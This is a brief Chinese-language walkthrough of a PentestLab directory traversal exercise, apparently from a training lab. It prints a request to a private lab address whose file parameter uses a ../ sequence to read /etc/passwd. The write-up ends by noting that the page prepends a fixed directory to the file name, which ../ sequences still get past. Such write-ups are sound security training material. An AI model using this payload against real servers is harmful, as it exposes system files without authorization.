PentestLab-web安全目录穿越-EXP2

我们打开第二个图片

进行观察

跟上一关一样，我们观察得知

我们尝试修改文件名称

http://192.168.20.157/dirtrav/example2.php?file=/var/www/files/etc/passwd

结果空白

可能是不存在这个目录

我们尝试

http://192.168.20.157/dirtrav/example2.php?file=/var/www/files/../../../../../etc/passwd

结果

我们打开靶机

观察源码

发现会给一个文件名加上一个文件目录路径

然而容易被../../进行过滤